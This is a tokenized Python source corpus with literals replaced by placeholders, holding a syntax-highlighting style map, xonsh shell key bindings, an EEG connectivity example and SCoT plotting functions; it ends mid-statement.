<EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> STYLES = { <EOL> '<STR_LIT>' : ALGOL_STYLE , <EOL> '<STR_LIT>' : ALGOL_NU_STYLE , <EOL> '<STR_LIT>' : AUTUMN_STYLE , <EOL> '<STR_LIT>' : BORLAND_STYLE , <EOL> '<STR_LIT>' : BW_STYLE , <EOL> '<STR_LIT>' : COLORFUL_STYLE , <EOL> '<STR_LIT:default>' : DEFAULT_STYLE , <EOL> '<STR_LIT>' : EMACS_STYLE , <EOL> '<STR_LIT>' : FRIENDLY_STYLE , <EOL> '<STR_LIT>' : FRUITY_STYLE , <EOL> '<STR_LIT>' : IGOR_STYLE , <EOL> '<STR_LIT>' : LOVELACE_STYLE , <EOL> '<STR_LIT>' : MANNI_STYLE , <EOL> '<STR_LIT>' : MONOKAI_STYLE , <EOL> '<STR_LIT>' : MURPHY_STYLE , <EOL> '<STR_LIT>' : NATIVE_STYLE , <EOL> '<STR_LIT>' : PARAISO_DARK_STYLE , <EOL> '<STR_LIT>' : PARAISO_LIGHT_STYLE , <EOL> '<STR_LIT>' : PASTIE_STYLE , <EOL> '<STR_LIT>' : PERLDOC_STYLE , <EOL> '<STR_LIT>' : RRT_STYLE , <EOL> '<STR_LIT>' : TANGO_STYLE , <EOL> '<STR_LIT>' : TRAC_STYLE , <EOL> '<STR_LIT>' : VIM_STYLE , <EOL> '<STR_LIT>' : VS_STYLE , <EOL> '<STR_LIT>' : XCODE_STYLE , <EOL> } </s>
<s> """<STR_LIT>""" <EOL> import builtins <EOL> from prompt_toolkit . filters import Filter , IsMultiline <EOL> from prompt_toolkit . keys import Keys <EOL> from xonsh . tools import ON_WINDOWS <EOL> env = builtins . __xonsh_env__ <EOL> indent_ = env . get ( '<STR_LIT>' ) <EOL> DEDENT_TOKENS = frozenset ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def carriage_return ( b , cli ) : <EOL> """<STR_LIT>""" <EOL> at_end_of_line = _is_blank ( b . document . current_line_after_cursor ) <EOL> current_line_blank = _is_blank ( b . document . current_line ) <EOL> if ( b . document . current_line_before_cursor . strip ( ) . endswith ( '<STR_LIT::>' ) and <EOL> at_end_of_line ) : <EOL> b . newline ( ) <EOL> b . insert_text ( indent_ , fire_event = False ) <EOL> elif ( not current_line_blank and <EOL> b . document . current_line . split ( maxsplit = <NUM_LIT:1> ) [ <NUM_LIT:0> ] in DEDENT_TOKENS and <EOL> b . document . line_count > <NUM_LIT:1> ) : <EOL> b . newline ( copy_margin = True ) <EOL> _ = b . delete_before_cursor ( count = len ( indent_ ) ) <EOL> elif ( not b . document . on_first_line and <EOL> not current_line_blank ) : <EOL> b . newline ( copy_margin = True ) <EOL> elif ( b . document . char_before_cursor == '<STR_LIT:\\>' and <EOL> not ( not builtins . __xonsh_env__ . get ( '<STR_LIT>' ) <EOL> and ON_WINDOWS ) ) : <EOL> b . newline ( ) <EOL> elif ( b . document . find_next_word_beginning ( ) is not None and <EOL> ( any ( not _is_blank ( i ) <EOL> for i <EOL> in b . document . lines_from_current [ <NUM_LIT:1> : ] ) ) ) : <EOL> b . newline ( copy_margin = True ) <EOL> elif not current_line_blank and not can_compile ( b . document . text ) : <EOL> b . newline ( ) <EOL> else : <EOL> b . accept_action . validate_and_handle ( cli , b ) <EOL> class TabShouldInsertIndentFilter ( Filter ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self , cli ) : <EOL> before_cursor = cli . current_buffer . document . current_line_before_cursor <EOL> return bool ( before_cursor . isspace ( ) ) <EOL> class BeginningOfLine ( Filter ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self , cli ) : <EOL> before_cursor = cli . current_buffer . document . current_line_before_cursor <EOL> return bool ( len ( before_cursor ) == <NUM_LIT:0> <EOL> and not cli . current_buffer . document . on_first_line ) <EOL> class EndOfLine ( Filter ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self , cli ) : <EOL> d = cli . current_buffer . document <EOL> at_end = d . is_cursor_at_the_end_of_line <EOL> last_line = d . is_cursor_at_the_end <EOL> return bool ( at_end and not last_line ) <EOL> def can_compile ( src ) : <EOL> """<STR_LIT>""" <EOL> src = src if src . endswith ( '<STR_LIT:\n>' ) else src + '<STR_LIT:\n>' <EOL> src = src . lstrip ( ) <EOL> try : <EOL> builtins . __xonsh_execer__ . compile ( src , mode = '<STR_LIT>' , glbs = None , <EOL> locs = builtins . __xonsh_ctx__ ) <EOL> rtn = True <EOL> except SyntaxError : <EOL> rtn = False <EOL> return rtn <EOL> def load_xonsh_bindings ( key_bindings_manager ) : <EOL> """<STR_LIT>""" <EOL> handle = key_bindings_manager . registry . add_binding <EOL> @ handle ( Keys . Tab , filter = TabShouldInsertIndentFilter ( ) ) <EOL> def _ ( event ) : <EOL> """<STR_LIT>""" <EOL> event . cli . current_buffer . insert_text ( env . get ( '<STR_LIT>' ) ) <EOL> @ handle ( Keys . BackTab ) <EOL> def insert_literal_tab ( event ) : <EOL> """<STR_LIT>""" <EOL> event . cli . current_buffer . insert_text ( env . get ( '<STR_LIT>' ) ) <EOL> @ handle ( Keys . ControlJ , filter = IsMultiline ( ) ) <EOL> def multiline_carriage_return ( event ) : <EOL> """<STR_LIT>""" <EOL> b = event . cli . current_buffer <EOL> carriage_return ( b , event . cli ) <EOL> @ handle ( Keys . Left , filter = BeginningOfLine ( ) ) <EOL> def wrap_cursor_back ( event ) : <EOL> """<STR_LIT>""" <EOL> b = event . cli . current_buffer <EOL> b . cursor_up ( count = <NUM_LIT:1> ) <EOL> relative_end_index = b . document . get_end_of_line_position ( ) <EOL> b . cursor_right ( count = relative_end_index ) <EOL> @ handle ( Keys . Right , filter = EndOfLine ( ) ) <EOL> def wrap_cursor_forward ( event ) : <EOL> """<STR_LIT>""" <EOL> b = event . cli . current_buffer <EOL> relative_begin_index = b . document . get_start_of_line_position ( ) <EOL> b . cursor_left ( count = abs ( relative_begin_index ) ) <EOL> b . cursor_down ( count = <NUM_LIT:1> ) <EOL> def _is_blank ( l ) : <EOL> return len ( l . strip ( ) ) == <NUM_LIT:0> </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> import scot <EOL> import scotdata . motorimagery as midata <EOL> raweeg = midata . eeg . T <EOL> triggers = np . asarray ( midata . triggers , dtype = int ) <EOL> classes = midata . classes <EOL> fs = midata . samplerate <EOL> locs = midata . locations <EOL> np . random . seed ( <NUM_LIT> ) <EOL> ws = scot . Workspace ( { '<STR_LIT>' : <NUM_LIT> } , reducedim = <NUM_LIT:4> , fs = fs , locations = locs ) <EOL> data = scot . datatools . cut_segments ( raweeg , triggers , <NUM_LIT:3> * fs , <NUM_LIT:4> * fs ) <EOL> ws . set_data ( data , classes ) <EOL> ws . do_cspvarica ( ) <EOL> p = ws . var_ . test_whiteness ( <NUM_LIT:50> ) <EOL> print ( '<STR_LIT>' , p ) <EOL> data = scot . datatools . cut_segments ( raweeg , triggers , - <NUM_LIT:2> * fs , <NUM_LIT:8> * fs ) <EOL> ws . plot_f_range = [ <NUM_LIT:0> , <NUM_LIT:30> ] <EOL> ws . plot_diagonal = '<STR_LIT>' <EOL> ws . plot_outside_topo = False <EOL> ws . set_data ( data , classes , time_offset = - <NUM_LIT:1> ) <EOL> fig = ws . plot_connectivity_topos ( ) <EOL> ws . set_used_labels ( [ '<STR_LIT>' ] ) <EOL> ws . get_tf_connectivity ( '<STR_LIT>' , <NUM_LIT:1> * fs , int ( <NUM_LIT> * fs ) , plot = fig , <EOL> crange = [ <NUM_LIT:0> , <NUM_LIT:30> ] ) <EOL> fig . suptitle ( '<STR_LIT>' ) <EOL> fig = ws . plot_connectivity_topos ( ) <EOL> ws . set_used_labels ( [ '<STR_LIT>' ] ) <EOL> ws . get_tf_connectivity ( '<STR_LIT>' , <NUM_LIT:1> * fs , int ( <NUM_LIT> * fs ) , plot = fig , <EOL> crange = [ <NUM_LIT:0> , <NUM_LIT:30> ] ) <EOL> fig . suptitle ( '<STR_LIT>' ) <EOL> ws . show_plots ( ) </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> def show_plots ( ) : <EOL> import matplotlib . pyplot as plt <EOL> plt . show ( ) <EOL> def new_figure ( * args , ** kwargs ) : <EOL> import matplotlib . pyplot as plt <EOL> return plt . figure ( * args , ** kwargs ) <EOL> def current_axis ( ) : <EOL> import matplotlib . pyplot as plt <EOL> return plt . gca ( ) <EOL> def MaxNLocator ( * args , ** kwargs ) : <EOL> from matplotlib . ticker import MaxNLocator as mnl <EOL> return mnl ( * args , ** kwargs ) <EOL> def prepare_topoplots ( topo , values ) : <EOL> """<STR_LIT>""" <EOL> values = np . atleast_2d ( values ) <EOL> topomaps = [ ] <EOL> for i in range ( values . shape [ <NUM_LIT:0> ] ) : <EOL> topo . set_values ( values [ i , : ] ) <EOL> topo . create_map ( ) <EOL> topomaps . append ( topo . get_map ( ) ) <EOL> return topomaps <EOL> def plot_topo ( axis , topo , topomap , crange = None , offset = ( <NUM_LIT:0> , <NUM_LIT:0> ) ) : <EOL> """<STR_LIT>""" <EOL> topo . set_map ( topomap ) <EOL> h = topo . plot_map ( axis , crange = crange , offset = offset ) <EOL> topo . plot_locations ( axis , offset = offset ) <EOL> topo . plot_head ( axis , offset = offset ) <EOL> return h <EOL> def plot_sources ( topo , mixmaps , unmixmaps , global_scale = None , fig = None ) : <EOL> """<STR_LIT>""" <EOL> urange , mrange = None , None <EOL> m = len ( mixmaps ) <EOL> if global_scale : <EOL> tmp = np . asarray ( unmixmaps ) <EOL> tmp = tmp [ np . logical_not ( np . isnan ( tmp ) ) ] <EOL> umax = np . percentile ( np . abs ( tmp ) , global_scale ) <EOL> umin = - umax <EOL> urange = [ umin , umax ] <EOL> tmp = np . asarray ( mixmaps ) <EOL> tmp = tmp [ np . logical_not ( np . isnan ( tmp ) ) ] <EOL> mmax = np . percentile ( np . abs ( tmp ) , global_scale ) <EOL> mmin = - mmax <EOL> mrange = [ mmin , mmax ] <EOL> y = np . floor ( np . sqrt ( m * <NUM_LIT:3> / <NUM_LIT:4> ) ) <EOL> x = np . ceil ( m / y ) <EOL> if fig is None : <EOL> fig = new_figure ( ) <EOL> axes = [ ] <EOL> for i in range ( m ) : <EOL> axes . append ( fig . add_subplot ( <NUM_LIT:2> * y , x , i + <NUM_LIT:1> ) ) <EOL> plot_topo ( axes [ - <NUM_LIT:1> ] , topo , unmixmaps [ i ] , crange = urange ) <EOL> axes [ - <NUM_LIT:1> ] . set_title ( str ( i ) ) <EOL> axes . append ( fig . add_subplot ( <NUM_LIT:2> * y , x , m + i + <NUM_LIT:1> ) ) <EOL> plot_topo ( axes [ - <NUM_LIT:1> ] , topo , mixmaps [ i ] , crange = mrange ) <EOL> axes [ - <NUM_LIT:1> ] . set_title ( str ( i ) ) <EOL> for a in axes : <EOL> a . set_yticks ( [ ] ) <EOL> a . set_xticks ( [ ] ) <EOL> a . set_frame_on ( False ) <EOL> axes [ <NUM_LIT:0> ] . set_ylabel ( '<STR_LIT>' ) <EOL> axes [ <NUM_LIT:1> ] . set_ylabel ( '<STR_LIT>' ) <EOL> return fig <EOL> def plot_connectivity_topos ( layout = '<STR_LIT>' , topo = None , topomaps = None , fig = None ) : <EOL> """<STR_LIT>""" <EOL> m = len ( topomaps ) <EOL> if fig is None : <EOL> fig = new_figure ( ) <EOL> if layout == '<STR_LIT>' : <EOL> for i in range ( m ) : <EOL> ax = fig . add_subplot ( m , m , i * ( <NUM_LIT:1> + m ) + <NUM_LIT:1> ) <EOL> plot_topo ( ax , topo , topomaps [ i ] ) <EOL> ax . set_yticks ( [ ] ) <EOL> ax . set_xticks ( [ ] ) <EOL> ax . set_frame_on ( False ) <EOL> else : <EOL> for i in range ( m ) : <EOL> for j in [ i + <NUM_LIT:2> , ( i + <NUM_LIT:1> ) * ( m + <NUM_LIT:1> ) + <NUM_LIT:1> ] : <EOL> ax = fig . add_subplot ( m + <NUM_LIT:1> , m + <NUM_LIT:1> , j ) <EOL> plot_topo ( ax , topo , topomaps [ i ] ) <EOL> ax . set_yticks ( [ ] ) <EOL> ax . set_xticks ( [ ] ) <EOL> ax . set_frame_on ( False ) <EOL> return fig <EOL> def plot_connectivity_spectrum ( a , fs = <NUM_LIT:2> , freq_range = ( - np . inf , np . inf ) , diagonal = <NUM_LIT:0> , border = False , fig = None ) : <EOL> """<STR_LIT>""" <EOL> a = np . atleast_3d ( a ) <EOL> if a . ndim == <NUM_LIT:3> : <EOL> [ _ , m , f ] = a . shape <EOL> l = <NUM_LIT:0> <EOL> else : <EOL> [ l , _ , m , f ] = a . shape <EOL> freq = np . linspace ( <NUM_LIT:0> , fs / <NUM_LIT:2> , f ) <EOL> lowest , highest = np . inf , - np . inf <EOL> left = max ( freq_range [ <NUM_LIT:0> ] , freq [ <NUM_LIT:0> ] ) <EOL> right = min ( freq_range [ <NUM_LIT:1> ] , freq [ - <NUM_LIT:1> ] ) <EOL> if fig is None : <EOL> fig = new_figure ( ) <EOL> axes = [ ] <EOL> for i in range ( m ) : <EOL> if diagonal == <NUM_LIT:1> : <EOL> jrange = [ i ] <EOL> elif diagonal == <NUM_LIT:0> : <EOL> jrange = range ( m ) <EOL> else : <EOL> jrange = [ j for j in range ( m ) if j != i ] <EOL> for j in jrange : <EOL> if border : <EOL> ax = fig . add_subplot ( m + <NUM_LIT:1> , m + <NUM_LIT:1> , j + ( i + <NUM_LIT:1> ) * ( m + <NUM_LIT:1> ) + <NUM_LIT:2> ) <EOL> else : <EOL> ax = fig . add_subplot ( m , m , j + i * m + <NUM_LIT:1> ) <EOL> axes . append ( ( i , j , ax ) ) <EOL> if l == <NUM_LIT:0> : <EOL> ax . plot ( freq , a [ i , j , : ] ) <EOL> lowest = min ( lowest , np . min ( a [ i , j , : ] ) ) <EOL> highest = max ( highest , np . max ( a [ i , j , : ] ) ) <EOL> elif l == <NUM_LIT:1> : <EOL> ax . fill_between ( freq , <NUM_LIT:0> , a [ <NUM_LIT:0> , i , j , : ] , facecolor = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , alpha = <NUM_LIT> ) <EOL> lowest = min ( lowest , np . min ( a [ <NUM_LIT:0> , i , j , : ] ) ) <EOL> highest = max ( highest , np . max ( a [ <NUM_LIT:0> , i , j , : ] ) ) <EOL> else : <EOL> baseline , = ax . plot ( freq , a [ <NUM_LIT:0> , i , j , : ] ) <EOL> ax . fill_between ( freq , a [ <NUM_LIT:1> , i , j , : ] , a [ <NUM_LIT:2> , i , j , : ] , facecolor = baseline . get_color ( ) , alpha = <NUM_LIT> ) <EOL> lowest = min ( lowest , np . min ( a [ : , i , j , : ] ) ) <EOL> highest = max ( highest , np . max ( a [ : , i , j , : ] ) ) <EOL> for i , j , ax in axes : <EOL> ax . xaxis . set_major_locator ( MaxNLocator ( max ( <NUM_LIT:1> , <NUM_LIT:7> - m ) ) ) <EOL> ax . yaxis . set_major_locator ( MaxNLocator ( max ( <NUM_LIT:1> , <NUM_LIT:7> - m ) ) ) <EOL> al = ax . get_ylim ( ) <EOL> ax . set_ylim ( min ( al [ <NUM_LIT:0> ] , lowest ) , max ( al [ <NUM_LIT:1> ] , highest ) ) <EOL> ax . set_xlim ( left , right ) <EOL> if <NUM_LIT:0> < i < m - <NUM_LIT:1> : <EOL> ax . set_xticks ( [ ] ) <EOL> if <NUM_LIT:0> < j < m - <NUM_LIT:1> : <EOL> ax . set_yticks ( [ ] ) <EOL> if i == <NUM_LIT:0> : <EOL> ax . xaxis . tick_top ( ) <EOL> if i == m - <NUM_LIT:1> : <EOL> ax . xaxis . tick_bottom ( ) <EOL> if j == <NUM_LIT:0> : <EOL> ax . yaxis . tick_left ( ) <EOL> if j == m - <NUM_LIT:1> : <EOL> ax . yaxis . tick_right ( ) <EOL> _plot_labels ( fig , <EOL> { '<STR_LIT:x>' : <NUM_LIT:0.5> , '<STR_LIT:y>' : <NUM_LIT> , '<STR_LIT:s>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:x>' : <NUM_LIT> , '<STR_LIT:y>' : <NUM_LIT:0.5> , '<STR_LIT:s>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> return fig <EOL> def plot_connectivity_significance ( s , fs = <NUM_LIT:2> , freq_range = ( - np . inf , np . inf ) , diagonal = <NUM_LIT:0> , border = False , fig = None ) : <EOL> """<STR_LIT>""" <EOL> a = np . atleast_3d ( s ) <EOL> [ _ , m , f ] = a . shape <EOL> freq = np . linspace ( <NUM_LIT:0> , fs / <NUM_LIT:2> , f ) <EOL> left = max ( freq_range [ <NUM_LIT:0> ] , freq [ <NUM_LIT:0> ] ) <EOL> right = min ( freq_range [ <NUM_LIT:1> ] , freq [ - <NUM_LIT:1> ] ) <EOL> imext = ( freq [ <NUM_LIT:0> ] , freq [ - <NUM_LIT:1> ] , - <NUM_LIT> , <NUM_LIT> ) <EOL> if fig is None : <EOL> fig = new_figure ( ) <EOL> axes = [ ] <EOL> for i in range ( m ) : <EOL> if diagonal == <NUM_LIT:1> : <EOL> jrange = [ i ] <EOL> elif diagonal == <NUM_LIT:0> : <EOL> jrange = range ( m ) <EOL> else : <EOL> jrange = [ j for j in range ( m ) if j != i ] <EOL> for j in jrange : <EOL> if border : <EOL> ax = fig . add_subplot ( m + <NUM_LIT:1> , m + <NUM_LIT:1> , j + ( i + <NUM_LIT:1> ) * ( m + <NUM_LIT:1> ) + <NUM_LIT:2> ) <EOL> else : <EOL> ax = fig . add_subplot ( m , m , j + i * m + <NUM_LIT:1> ) <EOL> axes . append ( ( i , j , ax ) ) <EOL> ax . imshow ( s [ i , j , np . newaxis ] , vmin = <NUM_LIT:0> , vmax = <NUM_LIT:2> , cmap = '<STR_LIT>' , aspect = '<STR_LIT>' , extent = imext , zorder = - <NUM_LIT> ) <EOL> ax . xaxis . set_major_locator ( MaxNLocator ( max ( <NUM_LIT:1> , <NUM_LIT:7> - m ) ) ) <EOL> ax . yaxis . set_major_locator ( MaxNLocator ( max ( <NUM_LIT:1> , <NUM_LIT:7> - m ) ) ) <EOL> ax . set_xlim ( left , right ) <EOL> if <NUM_LIT:0> < i < m - <NUM_LIT:1> : <EOL> ax . set_xticks ( [ ] ) <EOL> if <NUM_LIT:0> < j < m - <NUM_LIT:1> : <EOL> ax . set_yticks ( [ ] ) <EOL> if j == <NUM_LIT:0> : <EOL> ax . yaxis . tick_left ( ) <EOL> if j == m - <NUM_LIT:1> : <EOL> ax . yaxis . tick_right ( ) <EOL> _plot_labels ( fig , <EOL> { '<STR_LIT:x>' : <NUM_LIT:0.5> , '<STR_LIT:y>' : <NUM_LIT> , '<STR_LIT:s>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:x>' : <NUM_LIT> , '<STR_LIT:y>' : <NUM_LIT:0.5> , '<STR_LIT:s>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> return fig <EOL> def plot_connectivity_timespectrum ( a , fs = <NUM_LIT:2> , crange = None , freq_range = ( - np . inf , np . inf ) , time_range = None , diagonal = <NUM_LIT:0> , border = False , fig = None ) : <EOL> """<STR_LIT>""" <EOL> a = np . asarray ( a ) <EOL> [ _ , m , _ , t ] = a . shape <EOL> if crange is None : <EOL> crange = [ np . min ( a ) , np . max ( a ) ] <EOL> if time_range is None : <EOL> t0 = <NUM_LIT:0> <EOL> t1 = t <EOL> else : <EOL> t0 , t1 = time_range <EOL> f0 , f1 = fs / <NUM_LIT:2> , <NUM_LIT:0> <EOL> extent = [ t0 , t1 , f0 , f1 ] <EOL> ymin = max ( freq_range [ <NUM_LIT:0> ] , f1 ) <EOL> ymax = min ( freq_range [ <NUM_LIT:1> ] , f0 ) <EOL> if fig is None : <EOL> fig = new_figure ( ) <EOL> axes = [ ] <EOL> for i in range ( m ) : <EOL> if diagonal == <NUM_LIT:1> : <EOL> jrange = [ i ] <EOL> elif diagonal == <NUM_LIT:0> : <EOL> jrange = range ( m ) <EOL> else : <EOL> jrange = [ j for j in range ( m ) if j != i ] <EOL> for j in jrange : <EOL> if border : <EOL> ax = fig . add_subplot ( m + <NUM_LIT:1> , m + <NUM_LIT:1> , j + ( i + <NUM_LIT:1> ) * ( m + <NUM_LIT:1> ) + <NUM_LIT:2> ) <EOL> else : <EOL> ax = fig . add_subplot ( m , m , j + i * m + <NUM_LIT:1> ) <EOL> axes . append ( ax ) <EOL> ax . imshow ( a [ i , j , : , : ] , vmin = crange [ <NUM_LIT:0> ] , vmax = crange [ <NUM_LIT:1> ] , aspect = '<STR_LIT>' , extent = extent ) <EOL> ax . invert_yaxis ( ) <EOL> ax . xaxis . set_major_locator ( MaxNLocator ( max ( <NUM_LIT:1> , <NUM_LIT:9> - m ) ) ) <EOL> ax . yaxis . set_major_locator ( MaxNLocator ( max ( <NUM_LIT:1> , <NUM_LIT:7> - m ) ) ) <EOL> ax . set_ylim ( ymin , ymax ) <EOL> if <NUM_LIT:0> < i < m - <NUM_LIT:1> : <EOL> ax . set_xticks ( [ ] ) <EOL> if <NUM_LIT:0> < j < m - <NUM_LIT:1> : <EOL> ax . set_yticks ( [ ] ) <EOL> if i == <NUM_LIT:0> : <EOL> ax . xaxis . tick_top ( ) <EOL> if i == m - <NUM_LIT:1> : <EOL> ax . xaxis . tick_bottom ( ) <EOL> if j == <NUM_LIT:0> : <EOL> ax . yaxis . tick_left ( ) <EOL> if j == m - <NUM_LIT:1> : <EOL> ax . yaxis . tick_right ( ) <EOL> _plot_labels ( fig , <EOL> { '<STR_LIT:x>' : <NUM_LIT:0.5> , '<STR_LIT:y>' : <NUM_LIT> , '<STR_LIT:s>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:x>' : <NUM_LIT> , '<STR_LIT:y>' : <NUM_LIT:0.5> , '<STR_LIT:s>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> return fig <EOL> def plot_circular ( widths , colors , curviness = <NUM_LIT> , mask = True , topo = None , topomaps = None , axes = None , order = None ) : <EOL> """<STR_LIT>""" <EOL> colors = np . asarray ( colors ) <EOL> widths = np . asarray ( widths ) <EOL> mask = np . asarray ( mask ) <EOL> colors = np . maximum ( colors , <NUM_LIT:0> ) <EOL> colors = np . minimum ( colors , <NUM_LIT:1> ) <EOL> if len ( widths . shape ) > <NUM_LIT:2> : <EOL> [ n , m ] = widths . shape <EOL> elif len ( colors . shape ) > <NUM_LIT:3> : <EOL> [ n , m , c ] = widths . shape <EOL> elif len ( mask . shape ) > <NUM_LIT:2> : <EOL> [ n , m ] = mask . shape <EOL> else : <EOL> n = len ( topomaps ) <EOL> m = n <EOL> if not order : <EOL> order = list ( range ( n ) ) <EOL> assert ( n == m ) <EOL> if axes is None : <EOL> fig = new_figure ( ) <EOL> axes = fig . add_subplot ( <NUM_LIT> ) <EOL> axes . set_yticks ( [ ] ) <EOL> axes . set_xticks ( [ ] ) <EOL> axes . set_frame_on ( False ) <EOL> if len ( colors . shape ) < <NUM_LIT:3> : <EOL> colors = np . tile ( colors , ( n , n , <NUM_LIT:1> ) ) <EOL> if len ( widths . shape ) < <NUM_LIT:2> : <EOL> widths = np . tile ( widths , ( n , n ) ) <EOL> if len ( mask . shape ) < <NUM_LIT:2> : <EOL> mask = np . tile ( mask , ( n , n ) ) <EOL> np . fill_diagonal ( mask , False ) <EOL> if topo : <EOL> alpha = <NUM_LIT> if n < <NUM_LIT:10> else <NUM_LIT> <EOL> r = alpha * topo . head_radius / ( np . sin ( np . pi / n ) ) <EOL> else : <EOL> r = <NUM_LIT:1> <EOL> for i in range ( n ) : <EOL> if topo : <EOL> o = ( r * np . sin ( i * <NUM_LIT:2> * np . pi / n ) , r * np . cos ( i * <NUM_LIT:2> * np . pi / n ) ) <EOL> plot_topo ( axes , topo , topomaps [ order [ i ] ] , offset = o ) <EOL> for i in range ( n ) : <EOL> for j in range ( n ) : <EOL> if not mask [ order [ i ] , order [ j ] ] : <EOL> continue <EOL> a0 = j * <NUM_LIT:2> * np . pi / n <EOL> a1 = i * <NUM_LIT:2> * np . pi / n <EOL> x0 , y0 = r * np . sin ( a0 ) , r * np . cos ( a0 ) <EOL> x1 , y1 = r * np . sin ( a1 ) , r * np . cos ( a1 ) <EOL> ex = ( x0 + x1 ) / <NUM_LIT:2> <EOL> ey = ( y0 + y1 ) / <NUM_LIT:2> <EOL> en = np . sqrt ( ex ** <NUM_LIT:2> + ey ** <NUM_LIT:2> ) <EOL> if en < <NUM_LIT> : <EOL> en = <NUM_LIT:0> <EOL> ex = y0 / r <EOL> ey = - x0 / r <EOL> w = - r <EOL> else : <EOL> ex /= en <EOL> ey /= en <EOL> w = np . sqrt ( ( x1 - x0 ) ** <NUM_LIT:2> + ( y1 - y0 ) ** <NUM_LIT:2> ) / <NUM_LIT:2> <EOL> if x0 * y1 - y0 * x1 < <NUM_LIT:0> : <EOL> w = - w <EOL> d = en * ( <NUM_LIT:1> - curviness ) <EOL> h = en - d <EOL> t = np . linspace ( - <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:100> ) <EOL> dist = ( t ** <NUM_LIT:2> + <NUM_LIT:2> * t + <NUM_LIT:1> ) * w ** <NUM_LIT:2> + ( t ** <NUM_LIT:4> - <NUM_LIT:2> * t ** <NUM_LIT:2> + <NUM_LIT:1> ) * h ** <NUM_LIT:2> <EOL> tmask1 = dist >= ( <NUM_LIT> * topo . head_radius ) ** <NUM_LIT:2> <EOL> tmask2 = dist >= ( <NUM_LIT> * topo . head_radius ) ** <NUM_LIT:2> <EOL> tmask = np . logical_and ( tmask1 , tmask2 [ : : - <NUM_LIT:1> ] ) <EOL> t = t [ tmask ] <EOL> x = ( h * t * t + d ) * ex - w * t * ey <EOL> y = ( h * t * t + d ) * ey + w * t * ex <EOL> s = np . sqrt ( ( x [ - <NUM_LIT:2> ] - x [ - <NUM_LIT:1> ] ) ** <NUM_LIT:2> + ( y [ - <NUM_LIT:2> ] - y [ - <NUM_LIT:1> ] ) ** <NUM_LIT:2> ) <EOL> width = widths [ order [ i ] , order [ j ] ] <EOL> x1 = <NUM_LIT:0.1> * width * ( x [ - <NUM_LIT:2> ] - x [ - <NUM_LIT:1> ] + y [ - <NUM_LIT:2> ] - y [ - <NUM_LIT:1> ] ) / s + x [ - <NUM_LIT:1> ] <EOL> y1 = <NUM_LIT:0.1> * width * ( y [ - <NUM_LIT:2> ] - y [ - <NUM_LIT:1> ] - x [ - <NUM_LIT:2> ] + x [ - <NUM_LIT:1> ] ) / s + y [ - <NUM_LIT:1> ] <EOL> x2 = <NUM_LIT:0.1> * width * ( x [ - <NUM_LIT:2> ] - x [ - <NUM_LIT:1> ] - y [ - <NUM_LIT:2> ] + y [ - <NUM_LIT:1> ] ) / s + x [ - <NUM_LIT:1> ] <EOL> y2 = <NUM_LIT:0.1> * width * ( y [ - <NUM_LIT:2> ] - y [ - <NUM_LIT:1> ] + x [ - <NUM_LIT:2> ] - x [ - <NUM_LIT:1> ] ) / s + y [ - <NUM_LIT:1> ] <EOL> x = np . concatenate ( [ x , [ x1 , x [ - <NUM_LIT:1> ] , x2 ] ] ) <EOL> y = np . concatenate ( [ y , [ y1 , y [ - <NUM_LIT:1> ] , y2 ] ] ) <EOL> axes . plot ( x , y , lw = width , color = colors [ order [ i ] , order [ j ] ] , solid_capstyle = '<STR_LIT>' , solid_joinstyle = '<STR_LIT>' ) <EOL> return axes <EOL> def plot_whiteness ( var , h , repeats = <NUM_LIT:1000> , axis = None ) : <EOL> """<STR_LIT>""" <EOL> pr , q0 , q = var . test_whiteness ( h , repeats , True ) <EOL> if axis is None : <EOL> axis = current_axis ( ) <EOL> pdf , _ , _ = axis . hist ( q0 , <NUM_LIT:30> , normed = True , label = '<STR_LIT>' ) <EOL> axis . plot ( [ q , q ] , [ <NUM_LIT:0> , np . max ( pdf ) ] , '<STR_LIT>' , label = '<STR_LIT>' ) <EOL> axis . set_title ( '<STR_LIT>' % pr ) <EOL> axis . set_xlabel ( '<STR_LIT>' ) <EOL> axis . set_ylabel ( '<STR_LIT>' ) <EOL> axis . legend ( ) <EOL> return pr <EOL> def _plot_labels ( target , * labels ) : <EOL> for l in labels : <EOL> have_label = False <EOL> for child in target . get_children ( ) : <EOL> try : <EOL> if child . 